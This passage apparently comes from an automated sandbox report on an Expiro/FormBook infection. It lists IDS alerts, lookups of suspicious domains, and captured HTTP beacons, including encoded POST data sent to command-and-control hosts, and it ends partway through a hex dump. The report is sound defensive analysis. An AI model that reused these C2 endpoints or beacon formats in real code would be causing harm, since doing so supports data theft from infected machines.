            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:60973 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:61460 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49720 -> 52.11.240.239:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53933 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53973 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:53962 -> 13.213.51.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53932 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53936 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53936 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53950 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53957 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53950 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53967 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53967 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53960 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54010 -> 37.27.60.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53934 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54018 -> 37.27.60.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54024 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54027 -> 203.161.60.161:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53922 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53922 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53947 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53941 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53943 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53992 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54003 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54003 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:63550 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:53985 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:53985 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54026 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54026 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53964 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54029 -> 203.161.60.161:80
            Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:54005 -> 13.213.51.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53982 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54030 -> 203.161.60.161:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54030 -> 203.161.60.161:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54023 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53995 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:54022 -> 37.27.60.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:54022 -> 37.27.60.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53997 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:53977 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54025 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54028 -> 203.161.60.161:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:54014 -> 37.27.60.109:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.minimalbtc.xyz
            Source: DNS query: www.dappbtc.xyz
            Source: DNS query: www.stakemask.xyz
            Source: DNS query: www.agistaking.xyz
            Source: DNS query: www.publicblockchain.xyz
            Queries random domain names (often used to prevent blacklisting and sinkholes)
            Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
            Source: unknownNetwork traffic detected: DNS query count 84
            Source: global trafficTCP traffic: 192.168.2.4:53917 -> 162.159.36.2:53
            Source: Joe Sandbox ViewIP Address: 165.160.15.20 165.160.15.20
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.214.183.61:80 -> 192.168.2.4:53938
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.214.183.61:80 -> 192.168.2.4:53938
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49728
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49728
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:53978
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:53978
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49723
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49724
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49724
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49723
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:53946
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:53946
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:53980
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:53945
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:53945
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:53980
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:53953
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:53953
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:53983
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:53983
            Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:53989
            Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:53989
            Source: global trafficHTTP traffic detected: POST /idtdeni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 862
            Source: global trafficHTTP traffic detected: POST /ktxpmbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /egxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 862
            Source: global trafficHTTP traffic detected: POST /wd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /savevus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ehgyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gymegolihltgvcqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /gymegolihltgvcqo?usid=24&utid=11154195932 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: POST /aosibypyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /aosibypyx?usid=24&utid=11154196211 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
            Source: global trafficHTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /fufjgjyissa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /j422/?46X=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /hsovbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6c 78 6e 6f 52 46 6f 41 7a 36 51 39 34 51 47 35 6c 34 61 6e 58 30 57 58 39 76 48 34 5a 38 50 54 53 5a 6e 77 2f 31 42 43 75 61 46 70 33 7a 38 4e 48 62 4d 35 79 43 41 4f 65 67 56 37 79 73 51 59 67 4d 56 73 4a 50 43 48 4b 4c 74 61 70 70 52 4a 4e 39 36 34 46 32 73 44 66 2f 58 30 4c 55 6e 70 70 50 31 77 70 6a 79 6b 59 56 32 4f 31 62 42 57 74 2b 72 63 4b 5a 54 75 73 37 4a 63 67 72 6b 65 6e 72 45 36 7a 55 2b 52 79 4f 32 59 72 62 53 34 75 59 56 44 6e 68 30 6b 6c 74 31 54 52 70 67 38 6f 57 73 2b 4b 30 42 4a 45 43 55 69 73 69 67 70 65 74 42 51 44 41 3d 3d Data Ascii: 46X=iqKaQQ5tKlqPlxnoRFoAz6Q94QG5l4anX0WX9vH4Z8PTSZnw/1BCuaFp3z8NHbM5yCAOegV7ysQYgMVsJPCHKLtappRJN964F2sDf/X0LUnppP1wpjykYV2O1bBWt+rcKZTus7JcgrkenrE6zU+RyO2YrbS4uYVDnh0klt1TRpg8oWs+K0BJECUisigpetBQDA==
            Source: global trafficHTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6e 51 58 6f 54 6d 51 41 37 36 51 79 39 51 47 35 75 59 61 6a 58 30 61 58 39 74 33 6f 5a 4a 58 54 53 34 33 77 2b 30 42 43 37 61 46 70 38 54 38 49 45 72 4d 75 79 43 64 7a 65 6c 74 37 79 73 55 59 67 4a 70 73 49 38 36 47 4c 62 74 45 68 4a 52 4c 44 64 36 34 46 32 73 44 66 2f 72 53 4c 55 2f 70 6f 38 39 77 76 42 61 72 52 31 32 4e 69 72 42 57 6d 65 72 59 4b 5a 54 32 73 35 74 32 67 70 63 65 6e 70 63 36 30 46 2b 51 6c 65 32 43 6d 37 54 32 6d 74 6b 59 67 78 74 4e 71 76 6b 39 51 74 35 59 74 51 68 6b 62 46 67 65 57 43 77 52 78 6c 70 64 54 75 38 5a 59 4c 52 72 4f 73 52 6d 7a 36 4e 6d 70 6a 64 7a 6d 46 4b 70 36 54 45 3d Data Ascii: 46X=iqKaQQ5tKlqPnQXoTmQA76Qy9QG5uYajX0aX9t3oZJXTS43w+0BC7aFp8T8IErMuyCdzelt7ysUYgJpsI86GLbtEhJRLDd64F2sDf/rSLU/po89wvBarR12NirBWmerYKZT2s5t2gpcenpc60F+Qle2Cm7T2mtkYgxtNqvk9Qt5YtQhkbFgeWCwRxlpdTu8ZYLRrOsRmz6NmpjdzmFKp6TE=
            Source: global trafficHTTP traffic detected: POST /pyxq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.deepwork.cafeOrigin: http://www.deepwork.cafeCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.deepwork.cafe/pyxq/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 34 36 58 3d 69 71 4b 61 51 51 35 74 4b 6c 71 50 6e 51 58 6f 54 6d 51 41 37 36 51 79 39 51 47 35 75 59 61 6a 58 30 61 58 39 74 33 6f 5a 4b 33 54 53 71 76 77 2f 58 70 43 70 71 46 70 2f 54 38 4a 45 72 4d 76 79 43 45 34 65 6b 52 42 79 66 41 59 68 63 46 73 66 75 43 47 4a 72 74 45 30 5a 51 43 48 64 37 7a 46 32 38 66 66 2f 58 53 4c 58 37 70 6f 38 39 77 70 54 79 72 59 46 32 31 69 72 42 45 70 2b 72 63 4b 5a 54 75 73 36 68 6d 67 39 6f 65 6e 4a 4d 36 32 33 57 51 36 75 32 63 6a 37 53 72 6d 74 67 64 67 78 46 2f 71 72 70 32 51 5a 6c 59 67 47 6b 61 42 51 41 56 49 30 63 33 6c 48 4e 6f 66 5a 73 64 52 4a 4a 67 46 39 64 78 6c 34 46 4f 6d 30 6b 64 78 6d 6d 59 70 33 4b 66 35 45 47 33 61 76 4f 70 33 37 6e 38 56 7a 72 32 48 6e 61 63 48 75 42 69 62 7a 59 77 68 62 2f 78 65 36 4d 63 74 6a 61 4c 2b 70 68 71 31 4e 66 4f 33 33 72 77 4d 43 38 69 4a 56 75 35 4a 4c 37 71 39 70 36 71 7a 47 6a 51 44 71 4f 6e 35 71 49 5a 49 68 6a 48 69 35 42 72 49 44 31 6e 67 30 2f 79 56 74 37 57 47 76 46 44 6f 31 69 7a 51 6b 2b 79 43 72 64 7a 55 6c 79 78 4c 76 78 74 49 78 43 58 76 68 69 49 76 47 2b 65 71 4a 68 64 66 52 71 62 41 4c 6e 4d 2f 79 4d 74 2f 55 54 56 35 59 56 4e 57 52 31 30 50 68 62 7a 50 5a 51 52 78 6b 36 66 30 62 41 77 57 32 7a 4a 4a 31 6d 4d 75 75 31 48 37 33 63 4e 62 4a 72 68 7a 52 52 42 4a 2b 71 37 2b 6c 31 61 4c 59 38 76 65 37 71 35 59 71 32 62 62 53 37 30 74 2f 5a 51 73 6c 5a 4f 73 48 48 47 47 43 69 6f 75 2b 62 51 73 44 6a 73 30 76 58 6f 59 70 59 51 53 39 56 72 42 31 77 35 49 30 78 47 7a 68 4c 62 71 47 7a 74 58 4f 44 5a 63 64 59 65 54 4c 72 66 34 55 58 4e 67 49 4a 55 34 33 6d 4c 33 49 53 67 52 6e 38 2b 34 30 69 46 62 74 30 66 66 4b 67 64 2b 66 46 6e 4c 73 4c 35 54 51 63 7a 56 56 69 48 74 71 52 76 33 73 7a 43 69 46 64 48 31 7a 4f 77 6f 7a 6e 77 6e 46 42 56 59 65 2f 66 56 42 71 2f 37 36 62 39 78 2b 76 6f 4b 68 57 4b 51 65 67 4c 33 31 4a 52 58 66 6f 31 49 38 7a 2f 6e 6a 34 72 4a 4b 43 67 34 66 4b 52 6b 4d 57 73 4c 36 70 78 69 78 6d 2f 45 56 6e 2f 58 71 68 53 56 78 76 44 65 65 55 39 52 43 7a 59 32 30 45 7a 36 30 45 2f 45 4c 70 50 4d 47 43 39 47 6f 68 75 33 6a 73 4a 2b 44 42 68 70 6c 79 6b 2b 6a 73 55 32 65 74 50 66 36 33 52 52 64 4a 38 6b 63 4f 77 31 30 76 4b 31 47 4a 63 4d 62 57 6b 54 4a 56 45 39 54 55 61 38 62 33 30 6b 6f 59 45 4d 77 75 32 73 33 44 79 4c 70 6a 68 6c 4d 37 73 6a 71 2b 64 66 2f 58 68 30 73 45 32 34 64 4c 6c 4c 66 4a 67 37 62 6a 7a 2f 4d 45 77 68 51 32 4a 59 51 47 6b 53
